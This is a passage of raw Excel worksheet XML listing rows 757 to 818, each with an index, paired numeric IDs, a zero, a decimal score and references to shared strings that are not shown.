      <c r="D757">
        <v>0</v>
      </c>
      <c r="E757">
        <v>0.70630002021789551</v>
      </c>
      <c r="F757" t="s">
        <v>7</v>
      </c>
      <c r="G757" t="s">
        <v>1495</v>
      </c>
      <c r="H757" t="s">
        <v>1496</v>
      </c>
    </row>
    <row r="758" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A758" s="1">
        <v>756</v>
      </c>
      <c r="B758">
        <v>3891</v>
      </c>
      <c r="C758">
        <v>3891</v>
      </c>
      <c r="D758">
        <v>0</v>
      </c>
      <c r="E758">
        <v>0.63620001077651978</v>
      </c>
      <c r="F758" t="s">
        <v>7</v>
      </c>
      <c r="G758" t="s">
        <v>1497</v>
      </c>
      <c r="H758" t="s">
        <v>1498</v>
      </c>
    </row>
    <row r="759" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A759" s="1">
        <v>757</v>
      </c>
      <c r="B759">
        <v>3124</v>
      </c>
      <c r="C759">
        <v>3124</v>
      </c>
      <c r="D759">
        <v>0</v>
      </c>
      <c r="E759">
        <v>0.98610001802444458</v>
      </c>
      <c r="F759" t="s">
        <v>7</v>
      </c>
      <c r="G759" t="s">
        <v>1499</v>
      </c>
      <c r="H759" t="s">
        <v>1500</v>
      </c>
    </row>
    <row r="760" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A760" s="1">
        <v>758</v>
      </c>
      <c r="B760">
        <v>3901</v>
      </c>
      <c r="C760">
        <v>3901</v>
      </c>
      <c r="D760">
        <v>0</v>
      </c>
      <c r="E760">
        <v>0.49599999189376831</v>
      </c>
      <c r="F760" t="s">
        <v>7</v>
      </c>
      <c r="G760" t="s">
        <v>1501</v>
      </c>
      <c r="H760" t="s">
        <v>1502</v>
      </c>
    </row>
    <row r="761" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A761" s="1">
        <v>759</v>
      </c>
      <c r="B761">
        <v>3900</v>
      </c>
      <c r="C761">
        <v>3900</v>
      </c>
      <c r="D761">
        <v>0</v>
      </c>
      <c r="E761">
        <v>0.75609999895095825</v>
      </c>
      <c r="F761" t="s">
        <v>7</v>
      </c>
      <c r="G761" t="s">
        <v>1503</v>
      </c>
      <c r="H761" t="s">
        <v>1504</v>
      </c>
    </row>
    <row r="762" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A762" s="1">
        <v>760</v>
      </c>
      <c r="B762">
        <v>3134</v>
      </c>
      <c r="C762">
        <v>3134</v>
      </c>
      <c r="D762">
        <v>0</v>
      </c>
      <c r="E762">
        <v>0.90369999408721924</v>
      </c>
      <c r="F762" t="s">
        <v>7</v>
      </c>
      <c r="G762" t="s">
        <v>1505</v>
      </c>
      <c r="H762" t="s">
        <v>1506</v>
      </c>
    </row>
    <row r="763" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A763" s="1">
        <v>761</v>
      </c>
      <c r="B763">
        <v>3139</v>
      </c>
      <c r="C763">
        <v>3139</v>
      </c>
      <c r="D763">
        <v>0</v>
      </c>
      <c r="E763">
        <v>0.46909999847412109</v>
      </c>
      <c r="F763" t="s">
        <v>7</v>
      </c>
      <c r="G763" t="s">
        <v>1507</v>
      </c>
      <c r="H763" t="s">
        <v>1508</v>
      </c>
    </row>
    <row r="764" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A764" s="1">
        <v>762</v>
      </c>
      <c r="B764">
        <v>3896</v>
      </c>
      <c r="C764">
        <v>3896</v>
      </c>
      <c r="D764">
        <v>0</v>
      </c>
      <c r="E764">
        <v>0.72359997034072876</v>
      </c>
      <c r="F764" t="s">
        <v>7</v>
      </c>
      <c r="G764" t="s">
        <v>1509</v>
      </c>
      <c r="H764" t="s">
        <v>1510</v>
      </c>
    </row>
    <row r="765" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A765" s="1">
        <v>763</v>
      </c>
      <c r="B765">
        <v>3893</v>
      </c>
      <c r="C765">
        <v>3893</v>
      </c>
      <c r="D765">
        <v>0</v>
      </c>
      <c r="E765">
        <v>0.93559998273849487</v>
      </c>
      <c r="F765" t="s">
        <v>7</v>
      </c>
      <c r="G765" t="s">
        <v>1511</v>
      </c>
      <c r="H765" t="s">
        <v>1512</v>
      </c>
    </row>
    <row r="766" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A766" s="1">
        <v>764</v>
      </c>
      <c r="B766">
        <v>3892</v>
      </c>
      <c r="C766">
        <v>3892</v>
      </c>
      <c r="D766">
        <v>0</v>
      </c>
      <c r="E766">
        <v>0.85589998960494995</v>
      </c>
      <c r="F766" t="s">
        <v>7</v>
      </c>
      <c r="G766" t="s">
        <v>1513</v>
      </c>
      <c r="H766" t="s">
        <v>1514</v>
      </c>
    </row>
    <row r="767" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A767" s="1">
        <v>765</v>
      </c>
      <c r="B767">
        <v>3129</v>
      </c>
      <c r="C767">
        <v>3129</v>
      </c>
      <c r="D767">
        <v>0</v>
      </c>
      <c r="E767">
        <v>0.82120001316070557</v>
      </c>
      <c r="F767" t="s">
        <v>7</v>
      </c>
      <c r="G767" t="s">
        <v>1515</v>
      </c>
      <c r="H767" t="s">
        <v>1516</v>
      </c>
    </row>
    <row r="768" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A768" s="1">
        <v>766</v>
      </c>
      <c r="B768">
        <v>6285</v>
      </c>
      <c r="C768">
        <v>6285</v>
      </c>
      <c r="D768">
        <v>0</v>
      </c>
      <c r="E768">
        <v>0.5131000280380249</v>
      </c>
      <c r="F768" t="s">
        <v>7</v>
      </c>
      <c r="G768" t="s">
        <v>1517</v>
      </c>
      <c r="H768" t="s">
        <v>1518</v>
      </c>
    </row>
    <row r="769" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A769" s="1">
        <v>767</v>
      </c>
      <c r="B769">
        <v>3859</v>
      </c>
      <c r="C769">
        <v>3859</v>
      </c>
      <c r="D769">
        <v>0</v>
      </c>
      <c r="E769">
        <v>0.68709999322891235</v>
      </c>
      <c r="F769" t="s">
        <v>7</v>
      </c>
      <c r="G769" t="s">
        <v>1519</v>
      </c>
      <c r="H769" t="s">
        <v>1520</v>
      </c>
    </row>
    <row r="770" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A770" s="1">
        <v>768</v>
      </c>
      <c r="B770">
        <v>3192</v>
      </c>
      <c r="C770">
        <v>3192</v>
      </c>
      <c r="D770">
        <v>0</v>
      </c>
      <c r="E770">
        <v>0.76279997825622559</v>
      </c>
      <c r="F770" t="s">
        <v>7</v>
      </c>
      <c r="G770" t="s">
        <v>1521</v>
      </c>
      <c r="H770" t="s">
        <v>1522</v>
      </c>
    </row>
    <row r="771" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A771" s="1">
        <v>769</v>
      </c>
      <c r="B771">
        <v>6497</v>
      </c>
      <c r="C771">
        <v>6497</v>
      </c>
      <c r="D771">
        <v>0</v>
      </c>
      <c r="E771">
        <v>0.98739999532699585</v>
      </c>
      <c r="F771" t="s">
        <v>7</v>
      </c>
      <c r="G771" t="s">
        <v>1523</v>
      </c>
      <c r="H771" t="s">
        <v>1524</v>
      </c>
    </row>
    <row r="772" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A772" s="1">
        <v>770</v>
      </c>
      <c r="B772">
        <v>3237</v>
      </c>
      <c r="C772">
        <v>3237</v>
      </c>
      <c r="D772">
        <v>0</v>
      </c>
      <c r="E772">
        <v>0.97530001401901245</v>
      </c>
      <c r="F772" t="s">
        <v>7</v>
      </c>
      <c r="G772" t="s">
        <v>1525</v>
      </c>
      <c r="H772" t="s">
        <v>1526</v>
      </c>
    </row>
    <row r="773" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A773" s="1">
        <v>771</v>
      </c>
      <c r="B773">
        <v>3238</v>
      </c>
      <c r="C773">
        <v>3238</v>
      </c>
      <c r="D773">
        <v>0</v>
      </c>
      <c r="E773">
        <v>0.50880002975463867</v>
      </c>
      <c r="F773" t="s">
        <v>7</v>
      </c>
      <c r="G773" t="s">
        <v>1527</v>
      </c>
      <c r="H773" t="s">
        <v>1528</v>
      </c>
    </row>
    <row r="774" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A774" s="1">
        <v>772</v>
      </c>
      <c r="B774">
        <v>6295</v>
      </c>
      <c r="C774">
        <v>6295</v>
      </c>
      <c r="D774">
        <v>0</v>
      </c>
      <c r="E774">
        <v>0.98329997062683105</v>
      </c>
      <c r="F774" t="s">
        <v>7</v>
      </c>
      <c r="G774" t="s">
        <v>1529</v>
      </c>
      <c r="H774" t="s">
        <v>1530</v>
      </c>
    </row>
    <row r="775" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A775" s="1">
        <v>773</v>
      </c>
      <c r="B775">
        <v>3240</v>
      </c>
      <c r="C775">
        <v>3240</v>
      </c>
      <c r="D775">
        <v>0</v>
      </c>
      <c r="E775">
        <v>0.99779999256134033</v>
      </c>
      <c r="F775" t="s">
        <v>7</v>
      </c>
      <c r="G775" t="s">
        <v>1531</v>
      </c>
      <c r="H775" t="s">
        <v>983</v>
      </c>
    </row>
    <row r="776" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A776" s="1">
        <v>774</v>
      </c>
      <c r="B776">
        <v>6493</v>
      </c>
      <c r="C776">
        <v>6493</v>
      </c>
      <c r="D776">
        <v>0</v>
      </c>
      <c r="E776">
        <v>0.65600001811981201</v>
      </c>
      <c r="F776" t="s">
        <v>7</v>
      </c>
      <c r="G776" t="s">
        <v>1532</v>
      </c>
      <c r="H776" t="s">
        <v>1533</v>
      </c>
    </row>
    <row r="777" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A777" s="1">
        <v>775</v>
      </c>
      <c r="B777">
        <v>3245</v>
      </c>
      <c r="C777">
        <v>3245</v>
      </c>
      <c r="D777">
        <v>0</v>
      </c>
      <c r="E777">
        <v>0.55849999189376831</v>
      </c>
      <c r="F777" t="s">
        <v>7</v>
      </c>
      <c r="G777" t="s">
        <v>1534</v>
      </c>
      <c r="H777" t="s">
        <v>1535</v>
      </c>
    </row>
    <row r="778" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A778" s="1">
        <v>776</v>
      </c>
      <c r="B778">
        <v>3839</v>
      </c>
      <c r="C778">
        <v>3839</v>
      </c>
      <c r="D778">
        <v>0</v>
      </c>
      <c r="E778">
        <v>0.92199999094009399</v>
      </c>
      <c r="F778" t="s">
        <v>7</v>
      </c>
      <c r="G778" t="s">
        <v>1536</v>
      </c>
      <c r="H778" t="s">
        <v>1537</v>
      </c>
    </row>
    <row r="779" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A779" s="1">
        <v>777</v>
      </c>
      <c r="B779">
        <v>3246</v>
      </c>
      <c r="C779">
        <v>3246</v>
      </c>
      <c r="D779">
        <v>0</v>
      </c>
      <c r="E779">
        <v>0.93930000066757202</v>
      </c>
      <c r="F779" t="s">
        <v>7</v>
      </c>
      <c r="G779" t="s">
        <v>1538</v>
      </c>
      <c r="H779" t="s">
        <v>1539</v>
      </c>
    </row>
    <row r="780" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A780" s="1">
        <v>778</v>
      </c>
      <c r="B780">
        <v>3250</v>
      </c>
      <c r="C780">
        <v>3250</v>
      </c>
      <c r="D780">
        <v>0</v>
      </c>
      <c r="E780">
        <v>0.65230000019073486</v>
      </c>
      <c r="F780" t="s">
        <v>7</v>
      </c>
      <c r="G780" t="s">
        <v>1540</v>
      </c>
      <c r="H780" t="s">
        <v>1541</v>
      </c>
    </row>
    <row r="781" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A781" s="1">
        <v>779</v>
      </c>
      <c r="B781">
        <v>3251</v>
      </c>
      <c r="C781">
        <v>3251</v>
      </c>
      <c r="D781">
        <v>0</v>
      </c>
      <c r="E781">
        <v>0.99489998817443848</v>
      </c>
      <c r="F781" t="s">
        <v>7</v>
      </c>
      <c r="G781" t="s">
        <v>1542</v>
      </c>
      <c r="H781" t="s">
        <v>1543</v>
      </c>
    </row>
    <row r="782" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A782" s="1">
        <v>780</v>
      </c>
      <c r="B782">
        <v>3252</v>
      </c>
      <c r="C782">
        <v>3252</v>
      </c>
      <c r="D782">
        <v>0</v>
      </c>
      <c r="E782">
        <v>0.45039999485015869</v>
      </c>
      <c r="F782" t="s">
        <v>7</v>
      </c>
      <c r="G782" t="s">
        <v>1544</v>
      </c>
      <c r="H782" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="783" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A783" s="1">
        <v>781</v>
      </c>
      <c r="B783">
        <v>6491</v>
      </c>
      <c r="C783">
        <v>6491</v>
      </c>
      <c r="D783">
        <v>0</v>
      </c>
      <c r="E783">
        <v>0.60100001096725464</v>
      </c>
      <c r="F783" t="s">
        <v>7</v>
      </c>
      <c r="G783" t="s">
        <v>1546</v>
      </c>
      <c r="H783" t="s">
        <v>1425</v>
      </c>
    </row>
    <row r="784" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A784" s="1">
        <v>782</v>
      </c>
      <c r="B784">
        <v>6297</v>
      </c>
      <c r="C784">
        <v>6297</v>
      </c>
      <c r="D784">
        <v>0</v>
      </c>
      <c r="E784">
        <v>0.99800002574920654</v>
      </c>
      <c r="F784" t="s">
        <v>7</v>
      </c>
      <c r="G784" t="s">
        <v>1547</v>
      </c>
      <c r="H784" t="s">
        <v>1548</v>
      </c>
    </row>
    <row r="785" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A785" s="1">
        <v>783</v>
      </c>
      <c r="B785">
        <v>3258</v>
      </c>
      <c r="C785">
        <v>3258</v>
      </c>
      <c r="D785">
        <v>0</v>
      </c>
      <c r="E785">
        <v>0.95690000057220459</v>
      </c>
      <c r="F785" t="s">
        <v>7</v>
      </c>
      <c r="G785" t="s">
        <v>1549</v>
      </c>
      <c r="H785" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="786" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A786" s="1">
        <v>784</v>
      </c>
      <c r="B786">
        <v>3831</v>
      </c>
      <c r="C786">
        <v>3831</v>
      </c>
      <c r="D786">
        <v>0</v>
      </c>
      <c r="E786">
        <v>0.60689997673034668</v>
      </c>
      <c r="F786" t="s">
        <v>7</v>
      </c>
      <c r="G786" t="s">
        <v>1551</v>
      </c>
      <c r="H786" t="s">
        <v>1552</v>
      </c>
    </row>
    <row r="787" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A787" s="1">
        <v>785</v>
      </c>
      <c r="B787">
        <v>6492</v>
      </c>
      <c r="C787">
        <v>6492</v>
      </c>
      <c r="D787">
        <v>0</v>
      </c>
      <c r="E787">
        <v>0.91339999437332153</v>
      </c>
      <c r="F787" t="s">
        <v>7</v>
      </c>
      <c r="G787" t="s">
        <v>1553</v>
      </c>
      <c r="H787" t="s">
        <v>1554</v>
      </c>
    </row>
    <row r="788" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A788" s="1">
        <v>786</v>
      </c>
      <c r="B788">
        <v>6500</v>
      </c>
      <c r="C788">
        <v>6500</v>
      </c>
      <c r="D788">
        <v>0</v>
      </c>
      <c r="E788">
        <v>0.92400002479553223</v>
      </c>
      <c r="F788" t="s">
        <v>7</v>
      </c>
      <c r="G788" t="s">
        <v>1555</v>
      </c>
      <c r="H788" t="s">
        <v>1556</v>
      </c>
    </row>
    <row r="789" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A789" s="1">
        <v>787</v>
      </c>
      <c r="B789">
        <v>6292</v>
      </c>
      <c r="C789">
        <v>6292</v>
      </c>
      <c r="D789">
        <v>0</v>
      </c>
      <c r="E789">
        <v>0.99870002269744873</v>
      </c>
      <c r="F789" t="s">
        <v>7</v>
      </c>
      <c r="G789" t="s">
        <v>1557</v>
      </c>
      <c r="H789" t="s">
        <v>1558</v>
      </c>
    </row>
    <row r="790" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A790" s="1">
        <v>788</v>
      </c>
      <c r="B790">
        <v>6291</v>
      </c>
      <c r="C790">
        <v>6291</v>
      </c>
      <c r="D790">
        <v>0</v>
      </c>
      <c r="E790">
        <v>0.82649999856948853</v>
      </c>
      <c r="F790" t="s">
        <v>7</v>
      </c>
      <c r="G790" t="s">
        <v>1559</v>
      </c>
      <c r="H790" t="s">
        <v>1560</v>
      </c>
    </row>
    <row r="791" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A791" s="1">
        <v>789</v>
      </c>
      <c r="B791">
        <v>3193</v>
      </c>
      <c r="C791">
        <v>3193</v>
      </c>
      <c r="D791">
        <v>0</v>
      </c>
      <c r="E791">
        <v>0.62080001831054688</v>
      </c>
      <c r="F791" t="s">
        <v>7</v>
      </c>
      <c r="G791" t="s">
        <v>1561</v>
      </c>
      <c r="H791" t="s">
        <v>1562</v>
      </c>
    </row>
    <row r="792" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A792" s="1">
        <v>790</v>
      </c>
      <c r="B792">
        <v>3194</v>
      </c>
      <c r="C792">
        <v>3194</v>
      </c>
      <c r="D792">
        <v>0</v>
      </c>
      <c r="E792">
        <v>0.73269999027252197</v>
      </c>
      <c r="F792" t="s">
        <v>7</v>
      </c>
      <c r="G792" t="s">
        <v>1563</v>
      </c>
      <c r="H792" t="s">
        <v>1564</v>
      </c>
    </row>
    <row r="793" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A793" s="1">
        <v>791</v>
      </c>
      <c r="B793">
        <v>3195</v>
      </c>
      <c r="C793">
        <v>3195</v>
      </c>
      <c r="D793">
        <v>0</v>
      </c>
      <c r="E793">
        <v>0.51649999618530273</v>
      </c>
      <c r="F793" t="s">
        <v>7</v>
      </c>
      <c r="G793" t="s">
        <v>1565</v>
      </c>
      <c r="H793" t="s">
        <v>1566</v>
      </c>
    </row>
    <row r="794" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A794" s="1">
        <v>792</v>
      </c>
      <c r="B794">
        <v>3856</v>
      </c>
      <c r="C794">
        <v>3856</v>
      </c>
      <c r="D794">
        <v>0</v>
      </c>
      <c r="E794">
        <v>0.47380000352859503</v>
      </c>
      <c r="F794" t="s">
        <v>7</v>
      </c>
      <c r="G794" t="s">
        <v>1567</v>
      </c>
      <c r="H794" t="s">
        <v>1568</v>
      </c>
    </row>
    <row r="795" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A795" s="1">
        <v>793</v>
      </c>
      <c r="B795">
        <v>3855</v>
      </c>
      <c r="C795">
        <v>3855</v>
      </c>
      <c r="D795">
        <v>0</v>
      </c>
      <c r="E795">
        <v>0.71780002117156982</v>
      </c>
      <c r="F795" t="s">
        <v>7</v>
      </c>
      <c r="G795" t="s">
        <v>1569</v>
      </c>
      <c r="H795" t="s">
        <v>1570</v>
      </c>
    </row>
    <row r="796" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A796" s="1">
        <v>794</v>
      </c>
      <c r="B796">
        <v>3854</v>
      </c>
      <c r="C796">
        <v>3854</v>
      </c>
      <c r="D796">
        <v>0</v>
      </c>
      <c r="E796">
        <v>0.60750001668930054</v>
      </c>
      <c r="F796" t="s">
        <v>7</v>
      </c>
      <c r="G796" t="s">
        <v>1571</v>
      </c>
      <c r="H796" t="s">
        <v>1572</v>
      </c>
    </row>
    <row r="797" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A797" s="1">
        <v>795</v>
      </c>
      <c r="B797">
        <v>3853</v>
      </c>
      <c r="C797">
        <v>3853</v>
      </c>
      <c r="D797">
        <v>0</v>
      </c>
      <c r="E797">
        <v>0.55089998245239258</v>
      </c>
      <c r="F797" t="s">
        <v>7</v>
      </c>
      <c r="G797" t="s">
        <v>1573</v>
      </c>
      <c r="H797" t="s">
        <v>1574</v>
      </c>
    </row>
    <row r="798" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A798" s="1">
        <v>796</v>
      </c>
      <c r="B798">
        <v>3852</v>
      </c>
      <c r="C798">
        <v>3852</v>
      </c>
      <c r="D798">
        <v>0</v>
      </c>
      <c r="E798">
        <v>0.68559998273849487</v>
      </c>
      <c r="F798" t="s">
        <v>7</v>
      </c>
      <c r="G798" t="s">
        <v>1575</v>
      </c>
      <c r="H798" t="s">
        <v>1576</v>
      </c>
    </row>
    <row r="799" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A799" s="1">
        <v>797</v>
      </c>
      <c r="B799">
        <v>3851</v>
      </c>
      <c r="C799">
        <v>3851</v>
      </c>
      <c r="D799">
        <v>0</v>
      </c>
      <c r="E799">
        <v>0.40839999914169312</v>
      </c>
      <c r="F799" t="s">
        <v>7</v>
      </c>
      <c r="G799" t="s">
        <v>1577</v>
      </c>
      <c r="H799" t="s">
        <v>1578</v>
      </c>
    </row>
    <row r="800" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A800" s="1">
        <v>798</v>
      </c>
      <c r="B800">
        <v>3206</v>
      </c>
      <c r="C800">
        <v>3206</v>
      </c>
      <c r="D800">
        <v>0</v>
      </c>
      <c r="E800">
        <v>0.88739997148513794</v>
      </c>
      <c r="F800" t="s">
        <v>7</v>
      </c>
      <c r="G800" t="s">
        <v>1579</v>
      </c>
      <c r="H800" t="s">
        <v>1580</v>
      </c>
    </row>
    <row r="801" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A801" s="1">
        <v>799</v>
      </c>
      <c r="B801">
        <v>3211</v>
      </c>
      <c r="C801">
        <v>3211</v>
      </c>
      <c r="D801">
        <v>0</v>
      </c>
      <c r="E801">
        <v>0.74790000915527344</v>
      </c>
      <c r="F801" t="s">
        <v>7</v>
      </c>
      <c r="G801" t="s">
        <v>1581</v>
      </c>
      <c r="H801" t="s">
        <v>1582</v>
      </c>
    </row>
    <row r="802" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A802" s="1">
        <v>800</v>
      </c>
      <c r="B802">
        <v>3212</v>
      </c>
      <c r="C802">
        <v>3212</v>
      </c>
      <c r="D802">
        <v>0</v>
      </c>
      <c r="E802">
        <v>0.75160002708435059</v>
      </c>
      <c r="F802" t="s">
        <v>7</v>
      </c>
      <c r="G802" t="s">
        <v>1583</v>
      </c>
      <c r="H802" t="s">
        <v>1584</v>
      </c>
    </row>
    <row r="803" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A803" s="1">
        <v>801</v>
      </c>
      <c r="B803">
        <v>6508</v>
      </c>
      <c r="C803">
        <v>6508</v>
      </c>
      <c r="D803">
        <v>0</v>
      </c>
      <c r="E803">
        <v>0.8410000205039978</v>
      </c>
      <c r="F803" t="s">
        <v>7</v>
      </c>
      <c r="G803" t="s">
        <v>1585</v>
      </c>
      <c r="H803" t="s">
        <v>1586</v>
      </c>
    </row>
    <row r="804" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A804" s="1">
        <v>802</v>
      </c>
      <c r="B804">
        <v>3215</v>
      </c>
      <c r="C804">
        <v>3215</v>
      </c>
      <c r="D804">
        <v>0</v>
      </c>
      <c r="E804">
        <v>0.99510002136230469</v>
      </c>
      <c r="F804" t="s">
        <v>7</v>
      </c>
      <c r="G804" t="s">
        <v>1587</v>
      </c>
      <c r="H804" t="s">
        <v>1588</v>
      </c>
    </row>
    <row r="805" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A805" s="1">
        <v>803</v>
      </c>
      <c r="B805">
        <v>3847</v>
      </c>
      <c r="C805">
        <v>3847</v>
      </c>
      <c r="D805">
        <v>0</v>
      </c>
      <c r="E805">
        <v>0.95359998941421509</v>
      </c>
      <c r="F805" t="s">
        <v>7</v>
      </c>
      <c r="G805" t="s">
        <v>1589</v>
      </c>
      <c r="H805" t="s">
        <v>1590</v>
      </c>
    </row>
    <row r="806" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A806" s="1">
        <v>804</v>
      </c>
      <c r="B806">
        <v>6290</v>
      </c>
      <c r="C806">
        <v>6290</v>
      </c>
      <c r="D806">
        <v>0</v>
      </c>
      <c r="E806">
        <v>0.99769997596740723</v>
      </c>
      <c r="F806" t="s">
        <v>7</v>
      </c>
      <c r="G806" t="s">
        <v>1591</v>
      </c>
      <c r="H806" t="s">
        <v>1592</v>
      </c>
    </row>
    <row r="807" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A807" s="1">
        <v>805</v>
      </c>
      <c r="B807">
        <v>3220</v>
      </c>
      <c r="C807">
        <v>3220</v>
      </c>
      <c r="D807">
        <v>0</v>
      </c>
      <c r="E807">
        <v>0.59130001068115234</v>
      </c>
      <c r="F807" t="s">
        <v>7</v>
      </c>
      <c r="G807" t="s">
        <v>1593</v>
      </c>
      <c r="H807" t="s">
        <v>1594</v>
      </c>
    </row>
    <row r="808" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A808" s="1">
        <v>806</v>
      </c>
      <c r="B808">
        <v>6298</v>
      </c>
      <c r="C808">
        <v>6298</v>
      </c>
      <c r="D808">
        <v>0</v>
      </c>
      <c r="E808">
        <v>0.99699997901916504</v>
      </c>
      <c r="F808" t="s">
        <v>7</v>
      </c>
      <c r="G808" t="s">
        <v>1595</v>
      </c>
      <c r="H808" t="s">
        <v>1596</v>
      </c>
    </row>
    <row r="809" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A809" s="1">
        <v>807</v>
      </c>
      <c r="B809">
        <v>3113</v>
      </c>
      <c r="C809">
        <v>3113</v>
      </c>
      <c r="D809">
        <v>0</v>
      </c>
      <c r="E809">
        <v>0.92610001564025879</v>
      </c>
      <c r="F809" t="s">
        <v>7</v>
      </c>
      <c r="G809" t="s">
        <v>1597</v>
      </c>
      <c r="H809" t="s">
        <v>1598</v>
      </c>
    </row>
    <row r="810" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A810" s="1">
        <v>808</v>
      </c>
      <c r="B810">
        <v>3394</v>
      </c>
      <c r="C810">
        <v>3394</v>
      </c>
      <c r="D810">
        <v>0</v>
      </c>
      <c r="E810">
        <v>0.9966999888420105</v>
      </c>
      <c r="F810" t="s">
        <v>7</v>
      </c>
      <c r="G810" t="s">
        <v>1599</v>
      </c>
      <c r="H810" t="s">
        <v>1600</v>
      </c>
    </row>
    <row r="811" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A811" s="1">
        <v>809</v>
      </c>
      <c r="B811">
        <v>3396</v>
      </c>
      <c r="C811">
        <v>3396</v>
      </c>
      <c r="D811">
        <v>0</v>
      </c>
      <c r="E811">
        <v>0.99930000305175781</v>
      </c>
      <c r="F811" t="s">
        <v>7</v>
      </c>
      <c r="G811" t="s">
        <v>1601</v>
      </c>
      <c r="H811" t="s">
        <v>1602</v>
      </c>
    </row>
    <row r="812" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A812" s="1">
        <v>810</v>
      </c>
      <c r="B812">
        <v>6407</v>
      </c>
      <c r="C812">
        <v>6407</v>
      </c>
      <c r="D812">
        <v>0</v>
      </c>
      <c r="E812">
        <v>0.84280002117156982</v>
      </c>
      <c r="F812" t="s">
        <v>7</v>
      </c>
      <c r="G812" t="s">
        <v>1603</v>
      </c>
      <c r="H812" t="s">
        <v>1604</v>
      </c>
    </row>
    <row r="813" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A813" s="1">
        <v>811</v>
      </c>
      <c r="B813">
        <v>3562</v>
      </c>
      <c r="C813">
        <v>3562</v>
      </c>
      <c r="D813">
        <v>0</v>
      </c>
      <c r="E813">
        <v>0.65950000286102295</v>
      </c>
      <c r="F813" t="s">
        <v>7</v>
      </c>
      <c r="G813" t="s">
        <v>1605</v>
      </c>
      <c r="H813" t="s">
        <v>1606</v>
      </c>
    </row>
    <row r="814" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A814" s="1">
        <v>812</v>
      </c>
      <c r="B814">
        <v>3563</v>
      </c>
      <c r="C814">
        <v>3563</v>
      </c>
      <c r="D814">
        <v>0</v>
      </c>
      <c r="E814">
        <v>0.99910002946853638</v>
      </c>
      <c r="F814" t="s">
        <v>7</v>
      </c>
      <c r="G814" t="s">
        <v>1607</v>
      </c>
      <c r="H814" t="s">
        <v>1608</v>
      </c>
    </row>
    <row r="815" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A815" s="1">
        <v>813</v>
      </c>
      <c r="B815">
        <v>3565</v>
      </c>
      <c r="C815">
        <v>3565</v>
      </c>
      <c r="D815">
        <v>0</v>
      </c>
      <c r="E815">
        <v>0.52569997310638428</v>
      </c>
      <c r="F815" t="s">
        <v>7</v>
      </c>
      <c r="G815" t="s">
        <v>1609</v>
      </c>
      <c r="H815" t="s">
        <v>1610</v>
      </c>
    </row>
    <row r="816" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A816" s="1">
        <v>814</v>
      </c>
      <c r="B816">
        <v>3566</v>
      </c>
      <c r="C816">
        <v>3566</v>
      </c>
      <c r="D816">
        <v>0</v>
      </c>
      <c r="E816">
        <v>0.99589997529983521</v>
      </c>
      <c r="F816" t="s">
        <v>7</v>
      </c>
      <c r="G816" t="s">
        <v>1611</v>
      </c>
      <c r="H816" t="s">
        <v>1612</v>
      </c>
    </row>
    <row r="817" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A817" s="1">
        <v>815</v>
      </c>
      <c r="B817">
        <v>3570</v>
      </c>
      <c r="C817">
        <v>3570</v>
      </c>
      <c r="D817">
        <v>0</v>
      </c>
      <c r="E817">
        <v>0.46450001001358032</v>
      </c>
      <c r="F817" t="s">
        <v>7</v>
      </c>
      <c r="G817" t="s">
        <v>1613</v>
      </c>
      <c r="H817" t="s">
        <v>1614</v>
      </c>
    </row>
    <row r="818" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A818" s="1">
        <v>816</v>
      </c>
      <c r="B818">
        <v>3574</v>
      </c>
      <c r="C818">
        <v>3574</v>
